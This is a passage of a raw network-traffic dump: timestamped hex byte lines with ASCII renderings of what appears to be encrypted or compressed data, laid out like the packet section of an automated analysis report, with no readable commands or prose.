                                                                                                                                                            2022-09-29 12:45:03 UTC10065INData Raw: b1 1c 33 75 a9 ba b6 64 47 78 56 25 de 46 c4 2a d6 9b 67 45 ce 71 f9 e4 a9 ba 64 13 ab d3 e8 4f 01 ef 8f 0e af 8c 38 ba 55 cf 0f 61 b7 97 e5 32 ef 2e 26 c6 cb 30 fd 97 78 9e 26 64 70 d5 f3 65 82 01 a3 22 f7 67 25 e9 d7 43 b8 f9 34 1f da b4 db 3f 7c 31 3e 9e 15 01 42 da bf 8c 8d 30 40 94 5f 0a c7 35 33 9e 30 fe b5 f2 ab b9 c8 31 1d f0 5c 0d 9b 1a e0 c9 76 22 1d c7 da 99 ec b8 d7 67 ba 44 2b 81 e2 df 73 3d 1e 04 87 8b 74 71 6c 5e 7f 9b 67 f7 4a 52 5c 9e 61 fc af 78 7e f1 89 d2 19 5f b7 90 e3 cc 3b 5f 67 d6 bd d5 0f 9d 47 d7 44 fb 2e d3 58 e7 c6 5f de c2 da 1c 59 8b 89 e8 7c a1 7c 32 f6 44 e1 bb 76 47 82 a5 c4 ce 43 c9 af be 4a 0d f5 76 6f 0d e2 f2 60 ae 8d 56 1a 84 01 3f c6 b9 ee f2 57 05 ce 6b d9 30 f3 dc 48 c9 0d 04 5d 80 d5 23 84 5d bc e5 fe 35 82 a7 10
                                                                                                                                                            Data Ascii: 3udGxV%F*gEqdO8Ua2.&0x&dpe"g%C4?|1>B0@_5301\v"gD+s=tql^gJR\ax~_;_gGD.X_Y||2DvGCJvo`V?Wk0H]#]5
                                                                                                                                                            2022-09-29 12:45:03 UTC10081INData Raw: 12 87 03 12 79 d1 43 38 8d 47 0f 73 4d 4f 10 08 92 b4 f2 7f 42 3a b2 b9 5e ed 1a 9e 3e f3 0b 9b 95 ee d2 86 25 3e 9a b6 48 4e 0c 7b d5 18 b8 53 fc 24 bb d4 a0 ef 1e 03 f1 c5 d8 55 80 19 51 73 81 e6 e6 f4 22 29 fd ec 0e fa 29 85 7a 24 87 99 8c 5c ac 8c b2 4b 27 97 87 3d e1 54 5a a9 05 c7 9b e9 bc 34 5d 75 17 d8 ac 0a a3 7d bb 7d ca fe cd e5 c6 8f f2 c3 5d 73 f4 1b bf fd 59 ac 95 7f 43 71 91 29 fc 94 eb 13 17 5f 36 eb d6 da 4d 3b ab 0c 31 1a f5 33 1d e1 be 37 7c d0 f9 b6 8c 12 f6 24 4e 4a 18 e7 46 59 af fc 3a 6f dc 90 3a ad 9a aa f2 4e a5 92 08 96 14 24 c7 59 3a 46 57 97 bc 4b d5 80 7a 20 18 4c 4f a3 16 9d b0 31 90 f3 a9 a5 ef 93 ca d2 89 c7 e4 8e 1b 68 f2 6a 4a 68 ef 09 00 23 ca ee 14 ae 40 36 ec c9 54 62 7a bd 60 6e 49 02 c9 45 3a ff d4 ff cf db e0 99 36
                                                                                                                                                            Data Ascii: yC8GsMOB:^>%>HN{S$UQs"))z$\K'=TZ4]u}}]sYCq)_6M;137|$NJFY:o:N$Y:FWKz LO1hjJh#@6Tbz`nIE:6
                                                                                                                                                            2022-09-29 12:45:03 UTC10097INData Raw: 19 9b 46 31 60 b2 d8 98 13 52 51 81 55 41 71 63 b0 5e be 1a 24 13 87 a7 00 8f e5 59 72 11 ef ac 12 c7 89 be 8f 05 81 7e 11 3e 02 16 97 ac 37 3a 14 92 6d 9e 18 f5 f2 c1 42 c3 72 49 5c 1b 88 02 63 09 0e 4d d1 8b 46 ce 9d 64 dd aa 9b ed 76 1c 3e 20 8c f5 7e d5 95 78 26 10 a0 e9 05 9a fc 48 3a 25 22 1b 55 84 8c 3d 19 05 94 e1 06 64 37 09 8f ed 56 79 44 77 64 e2 35 a8 da 11 64 39 a1 d1 64 d3 ee 5d 8f 37 4b 69 c2 94 8b f7 8c 8c 99 c0 16 42 06 0f 77 a5 b9 17 f1 78 b9 e0 3a 3c 3d 07 06 42 a6 a4 ea e8 ef f7 07 73 f0 e9 e7 56 eb 01 e2 0e 8d 1c 8b 83 98 d5 30 94 2c 86 49 8c 0f 8b 57 ff 97 e7 c9 4f e5 2a bf 70 a4 93 81 42 5f 1b 00 5a 99 95 92 f8 8f a7 12 d2 4a 4c 26 8b 55 e6 0f 5b 94 aa 5c 49 0d 52 02 e2 c0 1d f3 e4 49 fc 5f cf e2 70 a0 1e f3 11 c6 02 06 36 5c bb f5
                                                                                                                                                            Data Ascii: F1`RQUAqc^$Yr~>7:mBrI\cMFdv> ~x&H:%"U=d7VyDwd5d9d]7KiBwx:<=BsV0,IWO*pB_ZJL&U[\IRI_p6\
                                                                                                                                                            2022-09-29 12:45:03 UTC10113INData Raw: 80 6e 27 b8 63 f0 d4 c4 3b 3b a4 14 4e b4 82 2f 2b 8f 3a 9f 3b 79 c3 84 bf c4 41 c2 05 7a 41 a7 59 e4 39 a3 f4 b3 c7 93 3b e5 65 99 1f 7a 09 94 b2 85 ce be d4 37 5a 0d 43 3b 7c bc 96 61 e2 d3 06 cb f6 de 94 a5 a7 88 0c 6c 21 6b 43 25 70 fa b0 bf fc 82 b5 bd 72 76 3d ca ab 71 fc 7a e7 0f 76 4c 9f ec bf a7 95 97 da 0b e7 9b eb 55 e0 f8 ad 64 a5 8a 5f c6 dc 99 3c 76 33 96 7a 85 72 90 87 b7 1f db a0 e1 5c 09 20 a5 db e9 fb 49 e7 1c 87 fa 17 40 d0 37 42 90 54 d3 2b 06 9a 91 cf 7b f9 13 d1 9f df 72 d3 f9 13 e1 33 73 ec 75 fb c2 59 3f b9 b7 df 5b f3 0c 7c c6 8c 7f 3f dd 7c 47 a2 6a 88 e0 68 65 02 50 16 fd 44 73 45 f8 2c 5c 92 2f b0 a3 55 b6 81 c8 e5 7c 9d ef 41 40 41 01 b0 5b bd 46 c0 34 bb a0 00 d8 3b 21 a7 a2 0b 65 75 b5 0f 5f ab 68 74 ff b8 5b 1f 75 d5 be 77
                                                                                                                                                            Data Ascii: n'c;;N/+:;yAzAY9;ez7ZC;|al!kC%prv=qzvLUd_<v3zr\ I@7BT+{r3suY?[|?|GjhePDsE,\/U|A@A[F4;!eu_ht[uw
                                                                                                                                                            2022-09-29 12:45:03 UTC10129INData Raw: f9 75 aa 62 95 7c db cc 4d bd 4f ce 22 46 3e 57 e9 ca d7 74 23 10 4e b2 cf e9 a5 ef 52 c5 06 73 17 dd 6a c3 99 34 90 75 7c 27 e3 8f eb 93 b3 92 4e 9b 52 c1 69 3a 25 13 ee a7 41 dd a9 33 4b 4a d4 e8 31 37 24 b4 b5 d0 c7 52 77 b6 90 48 9d 76 b9 f5 ba d8 83 89 17 f0 99 98 c4 25 1f 25 54 1d 55 81 5f bf 69 d7 6f 8c 6c 1f 0c 59 1a 4a d4 f6 7f a7 6c d4 5a 3a 26 c7 e2 17 99 db 88 30 ca 59 3e 98 d4 b9 19 4c 3d 1d 92 23 dc 68 09 6d 9c 23 e1 71 78 28 16 da 47 72 cf b3 d5 53 d7 d1 47 19 77 86 fc e8 71 25 6b d5 ba fb 7b dd 48 43 fa af 99 1d ca f0 64 c0 12 3f d4 df 53 ca fe dd fa 75 ed 53 99 b1 6b 3e 8e 32 c8 4e 46 af 3b 9d 3d 8e b5 f6 d3 5e 98 1b 2b 9e 27 3e 6c f1 ff 88 65 c1 bb 98 9a bf 10 95 d8 f2 72 47 1a 1a 78 22 61 c1 5f 49 dc c9 c2 3b 02 8a 2d 60 8b ae d6 ad 99
                                                                                                                                                            Data Ascii: ub|MO"F>Wt#NRsj4u|'NRi:%A3KJ17$RwHv%%TU_iolYJlZ:&0Y>L=#hm#qx(GrSGwq%k{HCd?SuSk>2NF;=^+'>lerGx"a_I;-`
                                                                                                                                                            2022-09-29 12:45:03 UTC10145INData Raw: ca 60 86 ac f0 c0 e4 66 37 38 72 36 86 02 57 6f 9d 9f 07 66 ad 07 c9 87 ac e4 bf 6c 5e b0 fd ff cc ae e6 92 1a 85 8d ad ec f5 10 84 14 6f 22 92 d9 9a e2 1a fb ed 7f d7 9a 40 b5 db 34 b4 79 e4 1a 87 ca a4 cc 98 b2 26 d1 68 ea b6 16 3d be d2 0c 5b ea 65 84 cb 82 c0 1c fa c2 5c 8a 92 a5 1f c7 a7 93 d0 2e e9 37 9d 63 4b 0a 0e 3f 3a 3c d5 c2 10 e8 6c 8f c3 65 e3 b3 49 4f 28 e2 a2 39 14 ad 07 2e 4b 3e 98 a7 40 ab 5b 0d 4f d7 58 94 6a 69 ab 73 bc 89 c2 1f 2d aa 51 5a 2f 43 90 e6 24 ef 2f 88 fc 8d 38 81 23 0a 61 91 9b c0 27 c9 78 89 5c c9 a0 7d f3 46 39 ea dc 5b dd bc 51 a7 5d e4 25 cd 2e 0b 58 c2 44 a0 cf 2d 6b bc cd d1 a1 c6 ae c2 98 5b f1 11 9b ad 40 cc e4 a4 40 a0 7d 0f ca cf 22 62 79 e6 58 a2 c8 3d b1 be 97 c0 0f 0d f9 5a ec 92 14 03 76 3b 34 de 10 ca 1a db
                                                                                                                                                            Data Ascii: `f78r6Wofl^o"@4y&h=[e\.7cK?:<leIO(9.K>@[OXjis-QZ/C$/8#a'x\}F9[Q]%.XD-k[@@}"byX=Zv;4
                                                                                                                                                            2022-09-29 12:45:03 UTC10161INData Raw: a5 d1 3b 18 4b c2 fa 24 36 78 b4 c3 01 78 74 56 70 e2 14 bf 24 95 2e db 13 7b 97 d1 83 98 e4 05 b4 21 bd 7d 6a d1 1c ff 36 be 07 90 a3 7f 83 c7 5d 80 3f cb 20 bb 4c c0 a7 32 d7 27 24 c2 5a 5f ab 58 d8 30 36 c8 43 5d 78 1c 49 6c e0 5f d7 e8 da 81 79 1f a6 26 7e ee 9b 2e e1 7b 14 56 66 d3 da 31 66 f9 35 9c ad 3a f6 cf 40 cf 92 ba 68 ed f6 80 c9 af 23 57 bd a1 07 e6 21 68 d8 16 b7 86 cb 88 6e 28 aa 62 78 22 6a 0c 72 96 5c af af 71 75 cf 65 04 53 64 5b 20 37 ac 9e 5b 6e cc 18 98 28 33 53 16 fa 79 37 af 3f 2f 5c e1 37 1a 05 36 4f c7 01 39 cf 3f 78 ff 8a 2c f1 99 d9 77 70 8a f9 f9 8f 72 ec 44 c5 fd 7f 6e 93 3f 52 93 3f a4 ab 97 d8 f4 8a 96 11 c4 06 e1 02 8d 2e 47 25 bc 0f f4 0f a5 ca bf 69 38 5a c2 37 d8 fb 13 ca 0c ac af 1a c4 93 16 ba d6 6a f0 ff eb 39 ca b8
                                                                                                                                                            Data Ascii: ;K$6xxtVp$.{!}j6]? L2'$Z_X06C]xIl_y&~.{Vf1f5:@h#W!hn(bx"jr\queSd[ 7[n(3Sy7?/\76O9?x,wprDn?R?.G%i8Z7j9
                                                                                                                                                            2022-09-29 12:45:03 UTC10177INData Raw: ed e7 5c 61 0b 0a f9 69 98 d1 c8 16 08 5d 49 72 dc fc 16 ca f1 e2 26 b5 6b 0d 32 f2 f8 59 e3 a9 83 2d f1 d2 08 22 b4 45 d2 9d aa 5c 4b 0d f1 48 85 07 b8 a8 11 d5 27 f6 e3 ab 7e 46 fc 1b 94 89 17 df ab da 2a 1e 4c d7 fe 5d 59 d8 03 08 40 ea 3c f3 09 db 99 3c b7 1a 29 a3 aa 0d 46 7f 77 1a 7e b3 df ae fe 1b 5b 75 9e ef 95 7b 6f 2c a1 0f b3 24 72 29 22 18 92 dc a7 ec 7b 46 8d 93 e2 61 84 f7 f9 f4 72 5a 23 b5 5c f6 fa 3a 44 c8 3d 69 3d 87 51 95 ab f7 94 68 27 23 43 30 ae 20 da 09 9c e3 7e af 07 53 44 1b fe 40 bf 54 85 dc e9 cb 4b e6 fd 33 f6 d0 c2 f3 d8 23 e5 6c cd 9c 48 b1 cb 0d 40 7c 57 0f cf e8 64 ba e2 63 f1 75 8d 29 19 f5 c4 ca f8 b1 a0 fd 12 a6 0c 7b 12 f4 6d 25 47 dd e1 56 07 5a 0b 0c 5f e5 6a 14 bd e7 25 34 6b ad 39 68 73 97 84 92 88 6e 21 6d e3 4c ff
                                                                                                                                                            Data Ascii: \ai]Ir&k2Y-"E\KH'~F*L]Y@<<)Fw~[u{o,$r)"{FarZ#\:D=i=Qh'#C0 ~SD@TK3#lH@|Wdcu){m%GVZ_j%4k9hsn!mL
                                                                                                                                                            2022-09-29 12:45:03 UTC10193INData Raw: ed 6d 45 cb c4 7d 42 a2 76 f1 e7 63 37 c3 e5 53 84 28 47 9f a2 50 cc 7d 2f 79 de 3e 13 48 16 51 28 16 c9 10 51 a4 39 c2 b2 f9 26 0a 1d f6 af d6 b5 fc ad 85 bf 08 8d 14 72 73 7a 54 71 d6 e0 97 82 ac 44 b8 d8 4c b0 a9 fb 1f 1c 61 61 06 00 3c d5 27 42 89 31 aa c0 d4 74 49 33 61 40 af 02 9e 7f 31 f6 37 6f ee a7 69 07 78 4c 05 23 89 bb 35 5c 3f 5a 36 d2 52 fd af e8 8d 7c ec a7 88 97 a0 1e 48 ba 74 97 eb df 19 56 07 5f 5b 66 41 36 0a a0 de e1 5a 82 0b 8f 69 1a e4 f6 b7 d1 8f 8d 4d 71 41 30 45 92 10 88 28 27 27 e0 51 31 40 4a 26 65 fc 0a de e8 64 da c8 58 5a b5 42 a8 bc 29 ea 94 1c 49 33 60 85 7e 39 40 b0 61 cd b2 02 6b 79 a5 5c e3 3b c7 f2 d6 75 ca 5c 7c 4a 92 12 eb 17 ac 79 26 1b ff 75 12 c2 40 43 e8 1b e7 70 8a b0 d4 b6 dc a5 21 c9 83 90 70 fa e0 d5 13 ce b3
                                                                                                                                                            Data Ascii: mE}Bvc7S(GP}/y>HQ(Q9&rszTqDLaa<'B1tI3a@17oixL#5\?Z6R|HtV_[fA6ZiMqA0E(''Q1@J&edXZB)I3`~9@aky\;u\|Jy&u@Cp!p
                                                                                                                                                            2022-09-29 12:45:03 UTC10209INData Raw: 01 89 37 e7 24 8f a6 05 e6 14 49 d8 06 20 06 c4 ca 95 46 2f 4b 54 62 80 db ec 84 45 f6 cb 16 be e5 40 52 97 4e 93 4c 35 96 6b 43 d9 db 19 b5 aa c8 35 4a 0e 40 c2 c4 a8 b3 bc 0c 76 8c 7a 26 41 36 a9 75 b4 4a bb 86 4f e9 84 f7 0b 44 10 55 53 d8 94 ca 51 3c be 04 a6 06 ef 5c f4 57 e2 1c 4d 5f 98 ae 54 13 cc a3 17 76 9e ff 47 72 42 49 05 84 c5 85 37 ae 4e e5 b7 f2 f7 27 d1 69 d4 8d 87 8b 4f f8 92 83 0a ee 2b 20 4d be 80 bb 51 fd 5d 65 80 30 0f 33 76 fc 53 30 48 63 e7 93 52 0b ca 70 ca bb a7 3b a3 ea 60 63 7d e9 5c b9 a0 6d a0 7b bb 62 14 73 42 95 cf cc c7 24 b4 9f a6 e3 fc 8b 1f c4 9d a4 3a bc 02 38 96 06 e5 eb 16 f3 32 50 f6 a9 fe 22 b0 12 29 b2 17 5f 2c 8d eb ac 5b c8 75 b3 89 40 0f 41 9a 9a 86 61 94 ca 6c 5d e4 2b 61 a9 53 71 48 8d 63 a6 c6 d5 b5 55 a2 72
                                                                                                                                                            Data Ascii: 7$I F/KTbE@RNL5kC5J@vz&A6uJODUSQ<\WM_TvGrBI7N'iO+ MQ]e03vS0HcRp;`c}\m{bsB$:82P")_,[u@Aal]+aSqHcUr
                                                                                                                                                            2022-09-29 12:45:03 UTC10225INData Raw: ae b0 ad ef fa 16 72 41 53 e2 0a 8e 08 cb 4c 81 84 05 d7 76 85 48 ce 3b 38 cf 2f 9c ad 5b d2 7c 8a 90 1b a7 27 4b 1d 1e ab 2a ac 52 b9 0f f0 5c 9d b4 39 0a 54 ef e1 77 93 1b 7e 0c 54 65 18 b1 ee 42 3d 47 ce 82 3b 5d 8e 3e 69 f6 63 77 79 2a dd cf f4 44 41 e4 de 98 c5 71 5b fd 14 14 e8 9d fa b0 68 d9 a3 9b 47 03 ad 45 bd ba e9 bd 1c 8d c3 34 97 93 7c 42 40 4f 8a e6 3c 10 15 11 79 98 97 31 7b f0 7f 51 86 3f 0f a9 eb 4d 37 44 51 5b d9 34 9f f6 12 5d d6 17 5f ec 05 32 32 c7 1c 9f e3 a9 3d 40 b6 46 57 b5 81 2c 74 d9 bf 8a e5 54 b2 ee 80 ac c9 7a ff ba 50 81 7a 18 01 c1 cb 46 21 00 0a 50 54 65 09 c0 6b ea 06 de 8e 4c a3 e7 fa d5 8d 90 a3 e2 2a fa c1 49 8c 2f b4 78 cd aa ad 9f 9e 42 62 0f e8 c7 b6 de 98 1e 7e 98 07 97 10 4d 44 c0 72 af 8e ca c7 85 17 b3 6e c7 55
                                                                                                                                                            Data Ascii: rASLvH;8/[|'K*R\9Tw~TeB=G;]>icwy*DAq[hGE4|B@O<y1{Q?M7DQ[4]_22=@FW,tTzPzF!PTekL*I/xBb~MDrnU
                                                                                                                                                            2022-09-29 12:45:03 UTC10241INData Raw: d0 73 e6 e7 78 78 b1 87 07 5d 4a b8 59 e8 32 cb a9 56 e8 ac ce b5 66 c9 42 72 83 c2 63 90 a7 c6 05 01 e7 fe bc 40 a6 ea 1f 08 13 9f 0c 8e 7c a4 c7 85 ff 59 f4 71 5a ca de 63 1a 2f 56 82 7d 33 88 a6 1b fa b6 c9 e6 96 80 10 f7 1f a2 36 fe 3d f6 95 89 fe cd de c6 bb 03 9c cd 49 bd c5 ce 1a dd c4 f6 9c 8d 67 3d e7 a1 a2 62 55 89 05 99 a3 0a 1c 6c 44 bf 38 52 c2 ef a8 46 84 ed b4 0b 49 5a d1 f6 d3 11 46 c9 26 08 68 a4 bb e7 e9 e8 8c 95 c0 c8 94 11 7a 0a bb 53 89 a8 43 9a 16 99 31 d8 fc 89 a0 80 16 39 89 d1 f4 e2 af 63 13 27 b7 92 99 9b 17 ca 2a 42 58 16 fe 5d 96 fc 03 75 91 0a 08 12 42 f7 22 d7 16 9b d5 2a 2a 13 53 f5 94 20 64 41 b5 6e 50 17 8b c6 11 25 65 c8 0e c5 8d 2d cc d8 c0 01 99 05 9f bc dc c5 38 84 8e 45 05 8e b9 ca c4 37 57 3f 1e 44 3c 89 7f c1 eb de
                                                                                                                                                            Data Ascii: sxx]JY2VfBrc@|YqZc/V}36=Ig=bUlD8RFIZF&hzSC19c'*BX]uB"**S dAnP%e-8E7W?D<
                                                                                                                                                            2022-09-29 12:45:03 UTC10257INData Raw: 8b fd 4e ee 66 f4 14 8f 95 dc cc 5b 24 0f 4d c5 6e 97 4f 39 06 bb 3d b2 6d d9 dc d3 67 7f 67 9a 14 c4 37 49 3e c8 53 aa ac 90 42 a7 ff b7 fd fe 3a 7e 72 0c 55 bd 40 7e 14 1e 52 3f 1f ce 06 15 e2 d1 1e ae 28 2d b1 66 55 1c 57 38 d2 6a 28 0f 8d 62 91 7e 54 13 1f 7c 59 b7 63 0b 02 db fe bd 32 ae 12 5a a6 7d 53 15 f1 8a 10 60 e9 2e 95 32 c4 33 fb f0 5a 5b 42 c2 a4 44 a0 69 1f 22 79 4e fe 8f 20 97 ae 17 21 07 78 bb b0 da f8 99 31 cf 03 fc 9a 3d 64 53 42 22 f5 63 5c 90 6a ef 0d d5 42 f5 a9 d9 6c 11 c6 ef 32 3c 04 11 a3 17 79 0b 10 21 7a 72 44 29 7d e2 30 f6 d0 9a b0 e7 f9 62 14 7e 19 06 3e 34 68 8e c1 b0 fd d2 22 4f 95 cb f1 6a b5 60 23 f7 73 3e ac 07 23 57 d1 04 74 cd 97 40 49 07 63 65 ca 2e a4 a4 94 90 c2 83 b8 88 a7 ba 4a a0 2c 5c eb 8a 5c d3 c4 fd be 6a ca
                                                                                                                                                            Data Ascii: Nf[$MnO9=mgg7I>SB:~rU@~R?(-fUW8j(b~T|Yc2Z}S`.23Z[BDi"yN !x1=dSB"c\jBl2<y!zrD)}0b~>4h"Oj`#s>#Wt@Ice.J,\\j
                                                                                                                                                            2022-09-29 12:45:03 UTC10273INData Raw: a8 f6 77 be ad 0b fb 61 a4 07 03 16 73 f1 65 e4 7c 6a 47 c0 43 f2 a4 e3 ec f5 63 d2 1a a4 87 d3 d7 e6 81 c4 c4 91 8a e3 24 c8 5b 95 6a e6 69 e1 9c af fe 44 dd 25 9a 84 ad 08 de 7d 49 9f 75 87 96 1c 94 55 34 50 ed 30 40 52 75 ec 9e 0b 46 1b 96 95 a1 d2 e9 61 6f 7c ec ad 0f f9 ce 8d 61 37 e2 12 43 ef cd ca 90 3f e1 5b 6c b4 61 f8 cb e9 47 eb 23 4a c2 5b 11 a2 42 f9 c0 47 8e d4 bf bc b2 3c cc c4 f3 91 87 4e b5 c4 a8 2c 92 a8 7c ea 25 49 d5 fc 69 f4 1e 90 2a 8f 13 7e 7a 4c 07 77 a0 4f f9 4e e1 07 27 75 a7 e6 e1 c8 b5 6b b1 0f bc 49 bb 59 8b d3 1b eb 5d be d1 2a 94 1b 2f 2c 65 f0 f1 fa c7 7d d8 b9 08 12 06 94 ed ac 45 04 d1 78 30 7e 4f 96 93 90 2d 9d f8 e4 02 cc a9 2b c4 12 02 81 8d 73 f7 86 e1 b1 bb e8 1d 0c a2 a4 1b ed af f2 a4 f3 67 74 4d 2f 3b 51 7c ab 5e
                                                                                                                                                            Data Ascii: wase|jGCc$[jiD%}IuU4P0@RuFao|a7C?[laG#J[BG<N,|%Ii*~zLwON'ukIY]*/,e}Ex0~O-+sgtM/;Q|^
                                                                                                                                                            2022-09-29 12:45:03 UTC10289INData Raw: 22 dc ae da e4 80 d0 5b a8 76 9b 30 c1 1b 4d 23 42 09 79 df 5e d5 b0 ab 29 c1 95 9e 25 52 f0 75 e2 1f a1 32 be 86 bd 70 c3 d8 bd 84 1a ec f7 38 e3 2e 03 8e 45 26 83 50 d4 47 0d b7 86 1d 01 c3 27 44 ea 53 be 94 ec 9a 6a ac 36 a7 78 92 2d b5 9c 5f ec 38 ba 12 26 ae 2a a6 39 c0 f4 17 0e 0e ae 67 19 8d fe 2e 39 69 f9 b2 35 e4 d3 b5 0b e6 c8 2e 27 56 3e 64 26 6d 47 32 6f 44 87 2d 74 36 f9 20 9d c4 fc 6e b2 8d 7e 66 99 21 bb 71 e1 6b e9 8a 01 87 84 4d 6c 1d 6b a5 f1 d9 24 2f a8 91 59 09 8e 66 08 0b 09 51 c6 5d 8b aa 8a 1f 25 59 22 30 c8 a9 a0 29 23 43 bf d6 4b 7b 85 a1 2f 8f 09 db 47 60 28 e1 b3 25 11 dd 0b 95 72 6e 2e 05 e0 a5 6c 04 f8 e0 d2 36 fd 45 1d b9 a1 3a 9f 2c 1c 30 0e da 47 ea dd 38 60 de 55 2f 42 dd c3 2a ee 07 69 f8 88 c4 c2 12 dc 73 d5 45 35 c4 3c
                                                                                                                                                            Data Ascii: "[v0M#By^)%Ru2p8.E&PG'DSj6x-_8&*9g.9i5.'V>d&mG2oD-t6 n~f!qkMlk$/YfQ]%Y"0)#CK{/G`(%rn.l6E:,0G8`U/B*isE5<
                                                                                                                                                            2022-09-29 12:45:03 UTC10305INData Raw: 6c 9e 76 53 28 0e bb 63 23 ef 9a 95 1e 3c 5e 98 1d 68 e9 0b 1f ef 1f f4 1d 7a bc ff 6d a3 27 41 44 41 cc 5e 25 16 10 d9 9c d0 cd 15 4b 11 1e 3f 61 30 ea a9 d3 ce 15 83 ee 41 fb 9c 10 17 4a 36 9f 39 7d 03 58 43 11 0b 0e 9b 8d 54 e7 80 15 ee a4 98 66 a6 e4 79 3d ae 53 06 72 72 c6 cf 44 3d 24 84 57 a4 cd 05 ec 39 d6 b2 c7 2d 94 70 ab 37 af 2d 1d 9e cf 37 a5 f3 4c 34 d7 7f 42 6b 9a 1e 88 24 5c 71 8c 9f f5 6d d7 4e 49 ac 77 c5 cc 0c ff 3e d8 4d 34 34 4f 8e 82 f3 74 c9 16 c8 0e 2b da 89 35 f4 19 fc d8 58 20 32 5a 7e 45 e5 fe 48 37 0b f1 ca 97 19 26 50 a7 cc 0c 0c e3 78 a9 b2 e5 75 fb e6 df bd a1 ff 7f 32 a2 c7 76 e5 d3 51 35 1c e4 54 2f e7 f4 ed eb a2 0a 5d e9 c6 1d 75 ee 94 fc 90 92 74 55 b9 37 6b 03 a7 96 90 64 c5 65 51 0e 5a 45 bd f3 07 7d 1a 2d 50 af f2 b4
                                                                                                                                                            Data Ascii: lvS(c#<^hzm'ADA^%K?a0AJ69}XCTfy=SrrD=$W9-p7-7L4Bk$\qmNIw>M44Ot+5X 2Z~EH7&Pxu2vQ5T/]utU7kdeQZE}-P
                                                                                                                                                            2022-09-29 12:45:03 UTC10321INData Raw: 00 8c 57 f4 bb ce 99 bc ce 29 08 4a 63 40 8b 28 a9 c7 d3 fe e6 fa 94 32 d9 69 85 ab e2 9a 80 22 df 8e 16 b5 1b 00 e4 d0 99 66 39 e8 4b 0f d3 c7 63 7b 92 fd 72 9e 12 cd 3d 04 0f 75 24 cb fa 87 98 ce 7c 0b c4 f5 28 aa 5c a5 fc d8 df ff 88 00 4d a4 a4 18 d2 ff 7c 90 15 cf 53 04 28 44 e3 aa 68 cc f1 17 01 57 c3 08 b2 20 50 86 90 2d 89 a2 42 ad 8b a1 07 ed da 96 02 0f e9 79 2c bc 07 d1 3f 5e 68 a9 43 2c 5e 74 8e 09 5c d2 30 35 2a 0a 95 eb e3 cd be 1a f1 99 de 9d 65 cb 15 9d ad bd 61 d6 99 03 f7 d5 6a 66 55 92 5f b1 f6 bd 79 8d 96 22 3b 4a 5b 2e 5d c3 39 b3 c3 e5 54 2f d2 bb bf b4 99 14 d8 b0 5c fc ad 1d b2 b0 39 d7 27 bf d0 9c 7a 77 01 d6 23 2a 30 26 d1 97 d6 e8 4e 8f bf fe 40 14 4e f3 94 bf 6c 83 7d cb 6d 53 0e b2 16 cd 5b 59 94 3d 2b 5c b7 24 f6 e6 9d 63 a2
                                                                                                                                                            Data Ascii: W)Jc@(2i"f9Kc{r=u$|(\M|S(DhW P-By,?^hC,^t\05*eajfU_y";J[.]9T/\9'zw#*0&N@Nl}mS[Y=+\$c
                                                                                                                                                            2022-09-29 12:45:03 UTC10337INData Raw: 61 33 b3 a4 5a c6 65 cc 17 14 dd 75 64 25 2b 16 70 04 f4 cf c1 85 fc 19 aa ed bc 5d 3d 2f 76 9c 20 0a ef 0e aa cb 79 18 7c 57 ac a0 3d de 01 a7 eb e0 4d c3 e5 62 12 34 04 92 9a 74 3b f4 ce ff 20 06 84 ec f3 95 00 fe 1f 67 37 7d 2b 8d d8 21 bc bb 75 96 3e d1 26 fc c2 e1 4a 75 20 1d 15 d2 81 f8 38 11 ae c1 05 76 62 dc ec ec f3 e9 d8 9b f6 d5 13 e1 58 a3 85 a8 4d ab 95 91 2c f4 3b ab eb 68 b6 00 09 f6 fc 2d d4 05 8a c5 b8 0c 3c 8a df f7 94 30 9a 0b 7e fd 3a 67 09 20 0d 60 7f 02 bb 1c 36 3f f4 c9 1a c9 43 97 77 d7 6a 1d d1 bb 88 b0 e7 82 72 62 85 18 7f cc 56 7a 6c 7f d3 2d c0 e2 5a 18 94 a2 a2 c5 5a ab bc c1 04 ef f1 cb ec 27 4a 30 d6 6d 00 ee 99 5f 12 81 e1 73 b1 78 6e 57 69 5d 58 95 7b 6b b0 c8 d5 90 7b 3b 7f e1 cb 07 3d ee 59 a8 ba c1 90 bb 82 c6 17 02 57
                                                                                                                                                            Data Ascii: a3Zeud%+p]=/v y|W=Mb4t; g7}+!u>&Ju 8vbXM,;h-<0~:g `6?CwjrbVzl-ZZ'J0m_sxnWi]X{k{;=YW
                                                                                                                                                            2022-09-29 12:45:03 UTC10353INData Raw: 6a 3d 18 97 06 a3 10 aa dc 63 1e 4a 54 c6 84 ac 6a 0c 19 a6 25 7d 91 50 8e cb b6 26 fa 38 4b ab 0b 01 e6 6e e5 54 8a 1b 9d 22 96 96 7b 38 4b 96 02 01 6e 52 46 f7 0a 30 2d 49 56 82 d8 7e d9 7e 82 a3 97 fc 3d 05 9c 56 d6 c6 f8 f4 c8 d5 18 93 4a 3b 1d c7 a6 a1 d7 03 60 08 c4 93 e1 75 23 9e 2a ef dc b6 c9 45 33 32 ba 49 81 d8 a0 2e 7a a2 70 69 c3 9b d3 9d e2 2a c7 17 8f 8e 2f 47 03 9e 44 d6 26 87 2c ed f4 ab 21 e7 86 c7 2e b4 f1 98 78 db 24 ff fb dd 18 34 6a 19 a4 bd 99 a9 2d e0 e6 b6 94 ca e6 fb c1 70 01 c9 e5 1f ab 38 8b de 4d 0a 73 80 70 f2 72 6d 7f 9a 02 88 76 58 74 35 3c a4 e5 f9 de 82 b7 e8 80 45 0f 02 48 61 c4 ab 3c 53 00 11 7e b6 45 e7 7d aa 33 8c 6e 20 d0 a4 df 0c da 89 2c 00 8b ed c2 bb ce 9e f1 53 26 08 e6 53 f4 08 95 c5 36 fb e3 f2 81 21 96 1d a2
                                                                                                                                                            Data Ascii: j=cJTj%}P&8KnT"{8KnRF0-IV~~=VJ;`u#*E32I.zpi*/GD&,!.x$4j-p8MsprmvXt5<EHa<S~E}3n ,S&S6!
